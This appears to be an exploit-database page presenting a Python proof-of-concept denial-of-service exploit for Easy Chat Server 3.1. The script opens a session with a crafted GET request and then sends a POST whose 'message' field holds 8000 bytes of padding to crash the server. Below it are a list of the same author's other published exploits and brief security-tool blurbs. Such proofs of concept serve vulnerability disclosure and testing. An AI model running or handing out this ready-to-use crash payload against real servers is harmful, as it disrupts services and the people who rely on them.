Search for hundreds of thousands of exploits

"Easy Chat Server 3.1 - 'message' Denial of Service (PoC)"

Author

Exploit author

"Miguel Mendez Z"

Platform

Exploit platform

windows

Release date

Exploit published date

2019-05-07

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
#!/usr/bin/python
#---------------------------------------------------------
# Title: Easy Chat Server Version 3.1 - (DOS)
# Date: 2019-05-07
# Author: Miguel Mendez Z
# Team: www.exploiting.cl
# Vendor: http://www.echatserver.com
# Software Link: http://www.echatserver.com/ecssetup.exe
# Platforms: Windows
# Version: 3.1
# Tested on: Windows Windows 7_x86/7_x64 [eng]
#---------------------------------------------------------
#
# 1- Primer socket con (GET) generamos una sesion valida para luego hacer el paso 2.
# 2- Segundo enviamos (POST) la data en la variable message para crashear la aplicacion.

import os, sys, socket
from time import sleep

ip = '127.0.0.1'
padding = 'A' * 8000

GET = (
"GET /chat.ghp?username=1&password=&room=1&sex=1 HTTP/1.1\r\n"
"User-Agent: Mozilla/4.0\r\n"
"Host: "+str(ip)+":80\r\n"
"Accept-Language: en-us\r\n"
"Accept-Encoding: gzip, deflate\r\n"
"Referer: http://"+str(ip)+"\r\n"
"Connection: Keep-Alive\r\n\r\n"
)

try:
  print "\n [*] Ejecutando payload GET (Creando Sesion) - length " + str(len(GET))
  s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s1.connect((ip, 80))
  s1.send(GET)
  s1.recv(1024)
  s1.close()
except:
  print "Sin conexion GET"

sleep(3)

POST = (
"POST /body2.ghp?username=1&password=&room=1 HTTP/1.1\r\n"
"Host: "+str(ip)+"\r\n"
"User-Agent: Mozilla/4.0\r\n"
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
"Accept-Language: es-CL,en-US;q=0.5\r\n"
"Accept-Encoding: gzip, deflate\r\n"
"Referer: http://"+str(ip)+"/chatsubmit.ghp?username=1&password=&room=1\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
"staticname=%3A000539&tnewname=&msayinfo=1&mnewname=&mtowho=All&mfilters=0&mfont=0&mfcolor=1&elist=&seltype=Theme&msg=&Submit=Send&sc=on&notifysound=on&message="+str(padding)+"&chat_flag="
)

try:
  print " [*] Ejecutando payload POST (Crashing) - length " + str(len(POST))
  s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s2.connect((ip, 80))
  s2.send(POST)
  s2.recv(1024)
  s2.close()
except:
  print "Sin conexion POST"
Release DateTitleTypePlatformAuthor
2020-03-16"Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)"webappsasp"Miguel Mendez Z"
2019-05-07"Easy Chat Server 3.1 - 'message' Denial of Service (PoC)"doswindows"Miguel Mendez Z"
2018-10-04"NICO-FTP 3.0.1.19 - Buffer Overflow (SEH) (ASLR Bypass)"localwindows_x86"Miguel Mendez Z"
2018-07-16"VelotiSmart WiFi B-380 Camera - Directory Traversal"webappshardware"Miguel Mendez Z"
2018-01-30"LabF nfsAxe 3.7 TFTP Client - Local Buffer Overflow"doswindows"Miguel Mendez Z"
2017-11-29"Dup Scout Enterprise 10.0.18 - 'Input Directory' Local Buffer Overflow (SEH)"remotewindows"Miguel Mendez Z"
2017-11-16"LanSweeper 6.0.100.75 - Cross-Site Scripting"webappsaspx"Miguel Mendez Z"
2017-06-20"BOA Web Server 0.94.14rc21 - Arbitrary File Access"webappslinux"Miguel Mendez Z"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46806/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.